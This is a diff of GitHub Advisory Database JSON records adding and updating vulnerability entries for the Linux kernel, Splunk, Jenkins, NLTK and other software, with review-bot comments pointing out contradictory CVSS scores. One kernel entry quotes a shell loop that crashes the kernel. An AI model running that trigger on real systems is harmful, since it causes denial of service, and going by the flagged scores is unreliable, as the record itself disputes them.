+ "id": "GHSA-5qf3-3gp9-pjx6",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-23222"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly\n\nThe existing allocation of scatterlists in omap_crypto_copy_sg_lists()\nwas allocating an array of scatterlist pointers, not scatterlist objects,\nresulting in a 4x too small allocation.\n\nUse sizeof(*new_sg) to get the correct object size.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23222"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/2ed27b5a1174351148c3adbfc0cd86d54072ba2e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/6edf8df4bd29f7bfd245b67b2c31d905f1cfc14b"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/c184341920ed78b6466360ed7b45b8922586c38f"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/d1836c628cb72734eb5f7dfd4c996a9c18bba3ad"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:31Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json b/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json
new file mode 100644
index 0000000000000..ccdda4562e27d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5qq8-6gv4-wmcc",
+ "modified": "2026-02-18T18:30:39Z",
+ "published": "2026-02-18T18:30:39Z",
+ "aliases": [
+ "CVE-2025-15579"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in OpenText™ Directory Services allows Object Injection. The vulnerability could lead to remote code execution, denial of service, or\nprivilege escalation.\n\nThis issue affects Directory Services: from 10.5 through 26.1.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:Y/R:U/V:C/RE:M/U:Red"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15579"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0859600&sys_kb_id=f82c01214707b6144549b6bd416d43b7&spa=1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:28Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json b/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json
index 85329480ef21b..73cf5cf59f57a 100644
--- a/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json
+++ b/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-636r-hfj8-v9m7", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2026-0715" ], "details": "Moxa Arm-based industrial computers running Moxa Industrial Linux Secure use a device-unique bootloader password provided on the device. An attacker with physical access to the device could use this information to access the bootloader menu via a serial interface.  Access to the bootloader menu does not allow full system takeover or privilege escalation. The bootloader enforces digital signature verification and only permits flashing of Moxa-signed images. As a result, an attacker cannot install malicious firmware or execute arbitrary code. The primary impact is limited to a potential temporary denial-of-service condition if a valid image is reflashed. Remote exploitation is not possible.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json b/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json new file mode 100644 index 0000000000000..641fe2b08c0ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json 
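Review bot: The added CVSS_V3 entry `"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"` rates confidentiality, integrity and availability all High, which contradicts the `details` string in the same hunk. That text says bootloader access allows neither full system takeover nor privilege escalation, that only Moxa-signed images can be flashed, and that the primary impact is a temporary denial of service. The existing CVSS_V4 vector carries the same VC:H/VI:H/VA:H, so the mismatch is presumably inherited from the upstream record rather than introduced by this sync. A vector consistent with the text would have C:N and I:N with a reduced A metric; until upstream reconciles the two, anything that ranks by vector should route CVE-2026-0715 to manual triage instead of trusting the score.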
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64jv-v62f-2xrg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20141" + ], + "details": "In Splunk Enterprise versions below 10.0.2, 10.0.3, 9.4.8, and 9.3.9, a low-privileged user who does not hold the \"admin\" Splunk role could access the Splunk Monitoring Console App endpoints due to an improper access control. This could lead to a sensitive information disclosure.

The Monitoring Console app is a bundled app that comes with Splunk Enterprise. It is not available for download on SplunkBase, and is not installed on Splunk Cloud Platform instances. This vulnerability does not affect [Cloud Monitoring Console](https://help.splunk.com/en/splunk-cloud-platform/administer/admin-manual/10.2.2510/monitor-your-splunk-cloud-platform-deployment/introduction-to-the-cloud-monitoring-console).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20141" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0206" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json new file mode 100644 index 0000000000000..2e3227d1f630e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json 
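Review bot: The vector `"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"` sets confidentiality to None and integrity to Low, while the `details` text describes a sensitive information disclosure and `cwe_ids` holds `CWE-200`. C and I look swapped; a consistent vector would presumably read `C:L/I:N/A:N`, to be confirmed against SVD-2026-0206. The affected-version list "below 10.0.2, 10.0.3, 9.4.8, and 9.3.9" also names two fixed versions in the same 10.0 line, which suggests a typo upstream, so version-based exposure checks are better taken from the vendor advisory than from this string.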
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rjp-j8mc-4f57", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2657" + ], + "details": "A vulnerability has been found in wren-lang wren up to 0.4.0. This impacts the function printError of the file src/vm/wren_compiler.c of the component Error Message Handler. Such manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2657" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren/issues/1221" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i1221/repro" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json new file mode 100644 index 0000000000000..d3013aa26201c 
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6xrx-3vj8-2rjc",
+ "modified": "2026-02-18T18:30:39Z",
+ "published": "2026-02-18T18:30:39Z",
+ "aliases": [
+ "CVE-2025-71230"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: ensure sb->s_fs_info is always cleaned up\n\nWhen hfs was converted to the new mount api a bug was introduced by\nchanging the allocation pattern of sb->s_fs_info. If setup_bdev_super()\nfails after a new superblock has been allocated by sget_fc(), but before\nhfs_fill_super() takes ownership of the filesystem-specific s_fs_info\ndata it was leaked.\n\nFix this by freeing sb->s_fs_info in hfs_kill_super().",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71230"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/399219831514126bc9541e8eadefe02c6fbd9166"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/46c1d56ad321fb024761abd9af61a0cb616cf2f6"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json
index 7b0a56750956f..fe2beee4b60ab 100644
--- a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json
+++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json
@@ -26,6 +26,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-284",
 "CWE-288"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json
index 327b526f1d626..ad4b1df5bf041 100644
--- a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json
+++ b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-74rw-28vp-8wh9",
- "modified": "2026-02-06T09:30:28Z",
+ "modified": "2026-02-18T18:30:23Z",
 "published": "2026-02-06T09:30:28Z",
 "aliases": [
 "CVE-2026-0521"
 ],
 "details": "A reflected cross-site scripting (XSS) vulnerability in the PDF export functionality of the TYDAC AG MAP+ solution allows unauthenticated attackers to craft a malicious URL, that if visited by a victim, will execute arbitrary JavaScript in the victim's context. Such a URL could be delivered through various means, for instance, by sending a link or by tricking victims to visit a page crafted by the attacker.\n\n\n\nThis issue was verified in MAP+: 3.4.0.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json
new file mode 100644
index 0000000000000..24d12465b54be
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json
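Review bot: The `CVSS_V3` entry added to GHSA-74rw-28vp-8wh9 (`C:L/I:L/A:N`) disagrees with the `CVSS_V4` entry already in the record (`VC:L/VI:H/VA:H`) on integrity and availability for the same reflected XSS. A consumer that prefers one CVSS version over the other gets a different priority for the same issue. The record should carry one consistent assessment; until the source is reconciled, tooling that reads it should state which vector it used.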
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78xc-39m5-v2c6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71233" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: endpoint: Avoid creating sub-groups asynchronously\n\nThe asynchronous creation of sub-groups by a delayed work could lead to a\nNULL pointer dereference when the driver directory is removed before the\nwork completes.\n\nThe crash can be easily reproduced with the following commands:\n\n # cd /sys/kernel/config/pci_ep/functions/pci_epf_test\n # for i in {1..20}; do mkdir test && rmdir test; done\n\n BUG: kernel NULL pointer dereference, address: 0000000000000088\n ...\n Call Trace:\n configfs_register_group+0x3d/0x190\n pci_epf_cfs_work+0x41/0x110\n process_one_work+0x18f/0x350\n worker_thread+0x25a/0x3a0\n\nFix this issue by using configfs_add_default_group() API which does not\nhave the deadlock problem as configfs_register_group() and does not require\nthe delayed work handler.\n\n[mani: slightly reworded the description and added stable list]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71233" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/24a253c3aa6d9a2cde46158ce9782e023bfbf32d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/73cee890adafa2c219bb865356e08e7f82423fe5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d9af3cf58bb4c8d6dea4166011c780756b1138b5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json new file mode 100644 index 0000000000000..bdefd92383ede --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fjm-558r-4j8r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70148" + ], + "details": "Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parameter, resulting in insecure direct object reference (IDOR).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70148" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70148-Membership-IDOR" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json new file mode 100644 index 0000000000000..a7ca0379d3cc8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p94-766c-hgjp", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-14009" + ], + "details": "A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14009" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json index 977856997d094..20e8e93f6cfb1 100644 --- a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json +++ b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json 
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-85h6-5m3v-gx37",
- "modified": "2026-02-18T15:31:27Z",
+ "modified": "2026-02-18T18:30:38Z",
 "published": "2026-02-18T15:31:27Z",
 "aliases": [
 "CVE-2026-27099"
 ],
 "details": "Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the \"Mark temporarily offline\" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,8 +25,10 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-18T15:18:43Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json
new file mode 100644
index 0000000000000..2de5576a67e7f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json
@@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-876r-52fj-4pxf", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71235" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Delay module unload while fabric scan in progress\n\nSystem crash seen during load/unload test in a loop.\n\n[105954.384919] RBP: ffff914589838dc0 R08: 0000000000000000 R09: 0000000000000086\n[105954.384920] R10: 000000000000000f R11: ffffa31240904be5 R12: ffff914605f868e0\n[105954.384921] R13: ffff914605f86910 R14: 0000000000008010 R15: 00000000ddb7c000\n[105954.384923] FS: 0000000000000000(0000) GS:ffff9163fec40000(0000) knlGS:0000000000000000\n[105954.384925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[105954.384926] CR2: 000055d31ce1d6a0 CR3: 0000000119f5e001 CR4: 0000000000770ee0\n[105954.384928] PKRU: 55555554\n[105954.384929] Call Trace:\n[105954.384931] \n[105954.384934] qla24xx_sp_unmap+0x1f3/0x2a0 [qla2xxx]\n[105954.384962] ? qla_async_scan_sp_done+0x114/0x1f0 [qla2xxx]\n[105954.384980] ? qla24xx_els_ct_entry+0x4de/0x760 [qla2xxx]\n[105954.384999] ? __wake_up_common+0x80/0x190\n[105954.385004] ? qla24xx_process_response_queue+0xc2/0xaa0 [qla2xxx]\n[105954.385023] ? qla24xx_msix_rsp_q+0x44/0xb0 [qla2xxx]\n[105954.385040] ? __handle_irq_event_percpu+0x3d/0x190\n[105954.385044] ? handle_irq_event+0x58/0xb0\n[105954.385046] ? handle_edge_irq+0x93/0x240\n[105954.385050] ? __common_interrupt+0x41/0xa0\n[105954.385055] ? common_interrupt+0x3e/0xa0\n[105954.385060] ? asm_common_interrupt+0x22/0x40\n\nThe root cause of this was that there was a free (dma_free_attrs) in the\ninterrupt context. There was a device discovery/fabric scan in\nprogress. A module unload was issued which set the UNLOADING flag. As\npart of the discovery, after receiving an interrupt a work queue was\nscheduled (which involved a work to be queued). 
Since the UNLOADING\nflag is set, the work item was not allocated and the mapped memory had\nto be freed. The free occurred in interrupt context leading to system\ncrash. Delay the driver unload until the fabric scan is complete to\navoid the crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71235" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/528b2f1027edfb52af0171f0f4b227fb356dde05" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7062eb0c488f35730334daad9495d9265c574853" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c068ebbaf52820d6bdefb9b405a1e426663c635a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d70f71d4c92bcb8b6a21ac62d4ea3e87721f4f32" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json new file mode 100644 index 0000000000000..5ff8a05c13e27 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json 
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j5g-3q2r-xfjh", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23224" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix UAF issue for file-backed mounts w/ directio option\n\n[ 9.269940][ T3222] Call trace:\n[ 9.269948][ T3222] ext4_file_read_iter+0xac/0x108\n[ 9.269979][ T3222] vfs_iocb_iter_read+0xac/0x198\n[ 9.269993][ T3222] erofs_fileio_rq_submit+0x12c/0x180\n[ 9.270008][ T3222] erofs_fileio_submit_bio+0x14/0x24\n[ 9.270030][ T3222] z_erofs_runqueue+0x834/0x8ac\n[ 9.270054][ T3222] z_erofs_read_folio+0x120/0x220\n[ 9.270083][ T3222] filemap_read_folio+0x60/0x120\n[ 9.270102][ T3222] filemap_fault+0xcac/0x1060\n[ 9.270119][ T3222] do_pte_missing+0x2d8/0x1554\n[ 9.270131][ T3222] handle_mm_fault+0x5ec/0x70c\n[ 9.270142][ T3222] do_page_fault+0x178/0x88c\n[ 9.270167][ T3222] do_translation_fault+0x38/0x54\n[ 9.270183][ T3222] do_mem_abort+0x54/0xac\n[ 9.270208][ T3222] el0_da+0x44/0x7c\n[ 9.270227][ T3222] el0t_64_sync_handler+0x5c/0xf4\n[ 9.270253][ T3222] el0t_64_sync+0x1bc/0x1c0\n\nEROFS may encounter above panic when enabling file-backed mount w/\ndirectio mount option, the root cause is it may suffer UAF in below\nrace condition:\n\n- z_erofs_read_folio wq s_dio_done_wq\n - z_erofs_runqueue\n - erofs_fileio_submit_bio\n - erofs_fileio_rq_submit\n - vfs_iocb_iter_read\n - ext4_file_read_iter\n - ext4_dio_read_iter\n - iomap_dio_rw\n : bio was submitted and return -EIOCBQUEUED\n - dio_aio_complete_work\n - dio_complete\n - dio->iocb->ki_complete (erofs_fileio_ki_complete())\n - kfree(rq)\n : it frees iocb, iocb.ki_filp can be UAF in file_accessed().\n - file_accessed\n : access NULL file point\n\nIntroduce a reference count in struct erofs_fileio_rq, and initialize it\nas two, both erofs_fileio_ki_complete() and erofs_fileio_rq_submit() will\ndecrease reference count, the last one decreasing 
the reference count\nto zero will free rq.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23224" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ae385826840a3c8e09bf38cac90adcd690716f57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b2ee5e4d5446babd23ff7beb4e636be0fb3ea5aa" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d741534302f71c511eb0bb670b92eaa7df4a0aec" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json index 77e61c9efb6e4..31bb4f1e329d7 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json +++ b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-288" + "CWE-288", + "CWE-400" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json new file mode 100644 index 0000000000000..ecca6b38fb478 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json 
